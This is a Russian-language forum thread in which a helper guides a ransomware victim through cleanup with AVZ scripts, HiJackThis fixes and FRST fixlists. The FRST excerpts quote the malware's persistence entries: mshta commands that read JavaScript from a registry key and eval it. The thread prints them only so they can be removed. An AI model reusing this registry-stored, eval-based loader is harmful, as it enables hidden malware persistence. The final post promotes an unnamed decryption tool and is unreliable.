Перейти к содержанию

Шифровальщик. KVRT не видит

Kiss
 Share

Рекомендуемые сообщения

Kiss Новичок

Kiss

Опубликовано
Опубликовано

22.12.2016 примерно в 19:20 появилось окно с CryptoLocker с требованием заплатить. Все файлы на всех дисках оказались зашифрованными. KVRT ничего не находит. Во вложении есть зашифрованный txt файл, может кому удастся его расшифровать.

CollectionLog-2016.12.23-21.20.zip

вирусы4.txt

Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Здравствуйте,

 

 

HiJackThis (из каталога автологгера) профиксить

R0 - HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command, = C:\Program Files\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1414205333&from=smt&uid=TOSHIBAXMQ01ABD032_82L2F5STSXX82L2F5STS
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type=ds&ts=1414205333&from=smt&uid=TOSHIBAXMQ01ABD032_82L2F5STSXX82L2F5STS&q={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer,(Default) = 72bcb6fa5ef811e6b1c250b7c34c0c70
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type=ds&ts=1414205333&from=smt&uid=TOSHIBAXMQ01ABD032_82L2F5STSXX82L2F5STS&q={searchTerms}
O2 - BHO: YTAHelperBHO - {FCE3FA8B-BA81-467C-81D8-E43C00D1BC71} - (no file)
O2 - BHO: browse pulse - {ed8e593d-1965-4e45-9d55-d56162dcde14} - C:\Program Files\browse pulse\Extensions\ed8e593d-1965-4e45-9d55-d56162dcde14.dll (file missing)
O4 - HKCU\..\Run: [2a45734a] C:\Users\Mikhail\AppData\Roaming\Microsoft\Crypto\sysgop.exe
AVZ выполнить следующий скрипт.

Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end; 
 TerminateProcessByName('c:\users\mikhail\appdata\roaming\microsoft\crypto\sysgop.exe');
 DeleteFile('C:\Windows\Tasks\PWKN.job','32');
 QuarantineFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-1-6.exe','');
 QuarantineFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-1-7.exe','');
 QuarantineFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-10.exe','');
 QuarantineFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-5.exe','');
 QuarantineFileF('C:\Program Files\SmartSaver+ 15', '*.exe,*.dll,*.sys, *.pif', false,'', 0, 0);
 QuarantineFileF('c:\users\mikhail\appdata\roaming\microsoft\crypto', '*.exe,*.dll,*.sys, *.pif', false,'', 0, 0);
 QuarantineFile('C:\Program Files\browse pulse\Extensions\ed8e593d-1965-4e45-9d55-d56162dcde14.dll','');
 QuarantineFile('C:\Users\Mikhail\AppData\Local\Kometa\Application\kometa.exe','');
 QuarantineFile('c:\users\mikhail\appdata\roaming\microsoft\crypto\sysgop.exe','');
 QuarantineFile('C:\Users\Mikhail\AppData\Roaming\PWKN.exe','');
 QuarantineFile('C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll','');
 DeleteFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-1-6.exe','32');
 DeleteFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-1-7.exe','32');
 DeleteFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-10.exe','32');
 DeleteFile('C:\Program Files\SmartSaver+ 15\916a028c-c71c-498c-8bc0-ff59580dd93d-5.exe','32');
 DeleteFile('C:\Users\Mikhail\AppData\Local\Kometa\Application\kometa.exe','32');
 DeleteFile('C:\Users\Mikhail\AppData\Roaming\Microsoft\Crypto\sysgop.exe','32');
 DeleteFile('C:\Users\Mikhail\AppData\Roaming\PWKN.exe','32');
 DeleteFile('C:\Windows\Tasks\916a028c-c71c-498c-8bc0-ff59580dd93d-1-6.job','32');
 DeleteFile('C:\Windows\Tasks\916a028c-c71c-498c-8bc0-ff59580dd93d-1-7.job','32');
 DeleteFile('C:\Windows\Tasks\916a028c-c71c-498c-8bc0-ff59580dd93d-10_user.job','32');
 DeleteFile('C:\Windows\Tasks\916a028c-c71c-498c-8bc0-ff59580dd93d-5.job','32');
 DeleteFile('C:\Windows\Tasks\916a028c-c71c-498c-8bc0-ff59580dd93d-5_user.job','32');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','2a45734a');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Eventlog\Application\IePluginServices','EventMessageFile');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect','EventMessageFile'); 
 BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

 

После перезагрузки:

- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.

1. В заголовке письма напишите "Запрос на исследование вредоносного файла".

2. В письме напишите "Выполняется запрос хэлпера".

3. Прикрепите файл карантина и нажмите "Отправить"

4. Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Подготовьте лог AdwCleaner и приложите его в теме.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
Kiss Новичок

Kiss

Опубликовано
  • Автор
Опубликовано

KLAN-5561710950

 

Спасибо, что отправили файл на исследование в Антивирусную Лабораторию.

Антивирус Касперского проверил файлы.

В файлах найдены вредоносные программы
sysgop.exe - Trojan.Win32.Inject.acuex

Вредоносные программы не найдены в файлах:
PerformanceMonitor.dll

Мы исследуем эти файлы. Если результат исследования будет отличаться, мы сообщим вам по электронной почте в течение пяти дней.

Это сообщение сформировано автоматической системой приёма писем. Пожалуйста не отвечайте на него.

AdwCleanerS0.txt

Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано
Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

 

- Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

  • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".

    B92LqRQ.png

  • Нажмите кнопку Scan.
  • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

Знакома ли Вам?

HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c47: "C:\Windows\system32\mshta.exe" "javascript:i7j1=new ActiveXObject("WScript.Shell");rqA1K=i7j1.RegRead("HKCU\\software\\eyaghpske\\tdcyhhfxtd");eval(rqA1K); <===== ATTENTION
HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c478: "C:\Windows\system32\mshta.exe" "javascript:Q9Co0v="a4xsU";Fi72=new ActiveXObject("WScript.Shell");V03gpet="YHyzofXu";tV3aq=Fi72.RegRead("HKCU\\software\\eyaghpske\\tdcyhhfxtd");R4iCp="H7";eval(tV3aq);y5ITb="s";" <===== ATTENTION
  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [] => [X]
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
S1 BAPIDRV; system32\DRIVERS\BAPIDRV.sys [X]
2016-12-22 19:46 - 2016-12-22 19:46 - 00002154 _____ C:\Users\Mikhail\Desktop\Your files are locked !.txt
2016-12-22 19:46 - 2016-12-22 19:46 - 00002154 _____ C:\Users\Mikhail\Desktop\Your files are locked !!.txt
2016-12-22 19:46 - 2016-12-22 19:46 - 00002154 _____ C:\Users\Mikhail\Desktop\Your files are locked !!!.txt
2016-12-22 19:46 - 2016-12-22 19:46 - 00002154 _____ C:\Users\Mikhail\Desktop\Your files are locked !!!!.txt
2016-12-22 19:46 - 2016-12-22 19:46 - 00002154 _____ C:\Users\Mikhail\Desktop\Your files are locked !!!!!.txt
Reboot:
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
Ссылка на комментарий
Поделиться на другие сайты
SQ Гигант мысли

SQ

Опубликовано
Опубликовано

  • Закройте и сохраните все открытые приложения.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
CloseProcesses:
Reg: reg export "HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c47:" C:\FRST\Quarantine\backup_384c47.reg
Reg: reg export "HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c478:" C:\FRST\Quarantine\backup_384c478.reg
HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c47: "C:\Windows\system32\mshta.exe" "javascript:i7j1=new ActiveXObject("WScript.Shell");rqA1K=i7j1.RegRead("HKCU\\software\\eyaghpske\\tdcyhhfxtd");eval(rqA1K); <===== ATTENTION
HKU\S-1-5-21-1580852256-1425000765-2085901234-1000\Software\Classes\384c478: "C:\Windows\system32\mshta.exe" "javascript:Q9Co0v="a4xsU";Fi72=new ActiveXObject("WScript.Shell");V03gpet="YHyzofXu";tV3aq=Fi72.RegRead("HKCU\\software\\eyaghpske\\tdcyhhfxtd");R4iCp="H7";eval(tV3aq);y5ITb="s";" <===== ATTENTION
Reboot:
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
  • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.


 

Ссылка на комментарий
Поделиться на другие сайты
  • 3 months later...
Cronbyte Новичок

Cronbyte

Опубликовано
Опубликовано

Недавно наткнулся на форум с положительными отзывами об этом инструменте в качестве расшифровщика PClock [удалено]. Проверил его в качестве сканера - похоже на правду. Если есть возможность, проверьте его в качестве ремувера. Спасибо!

Ссылка на комментарий
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
 Share
Перейти к списку тем

  • Похожий контент

    • lonoa
      Не видит Жесткие диски
      От lonoa
      Здравствуйте, у меня есть загрузочный диск kaspersky rescue disk 10, на двух ноутбуках Asus x550c и Toshiba satellite l850d не видит жесткие диски только загрузочные сектора. (На других компьютерах с этой же болванки все работает.) В настройках биоса защиты жесткого диска не стоит все отключено. Помогите разобраться. С Уважением Александр
    • Fast_diesel
      После проверки и лечения KVRT и KTS heur:trojan.multi.genbadur восстанавливается.
      От Fast_diesel
      Касперский тотал секьюрити вирус HEUR: Trojan. Multi.GenBadur.genw Расположение: Системная память, после лечения с перезагрузкой опять его нашел, а потом лечение с перезагрузкой и опять он тут. KTS его тоже находит, лечит, но после перезагрузки он опять тут. Windows 11, с последними обновлениями.
      Данная проблема возможно появилась после скачивания и установки игр с Torrent с сайта https://stoigr.org/dlya-geimpada/10267-hogwarts-legacy.html
      CollectionLog-2024.11.08-21.18.zip
    • Александр94
      Шифровальщик
      От Александр94
      Поймаи шифровальщик один в один как в теме  
       
      csb.log.[MJ-UE8059316472](decodehop@gmail.com ).rar csb.log.[MJ-UE8059316472](decodehop@gmail.com ).rar FRST.txt Addition.txt
    • KL FC Bot
      Банкер Mamont под видом приложения для трекинга | Блог Касперского
      От KL FC Bot
      Мы обнаружили новую схему распространения трояна-банкера Mamont. Злоумышленники обещают доставить некий товар по оптовым ценам, которые могут быть интересны как малому бизнесу, так и частным покупателям, и предлагают установить Android-приложение для отслеживания посылки. По факту же вместо трекинговой утилиты жертве подсовывают троян, служащий для перехвата финансовых учетных данных, пуш-уведомлений и другой важной информации.
      Схема мошенничества
      На ряде сайтов злоумышленники якобы продают различные товары по достаточно привлекательным ценам. Для покупки жертве предлагают присоединиться к закрытому чату в мессенджере Telegram, где размещены инструкции по размещению заказа. По сути эти инструкции сводятся к тому, что жертве нужно написать личное сообщение менеджеру. Сам канал существует для большей убедительности: в нем идет общение участников, которые задают уточняющие вопросы, получают ответы, что-то комментируют. Вероятно, среди участников этого чата есть как другие жертвы схемы, так и боты, которые создают видимость активной торговли.
       
      View the full article
    • WhySpice
      Шифровальщик cyberfear
      От WhySpice
      Утром снесло домашний сервер с открытым вне RDP. Зашифровало абсолютно все, все мои рабочие проекты, python скрипты, виртуалки vmware/virtualbox

      Зашифрованный файл: https://cloud.mail.ru/public/qDiR/yEN8ogSZJ
      Addition_06-01-2025 15.06.34.txt FRST_06-01-2025 15.01.14.txt
      README.txt
×
×
  • Создать...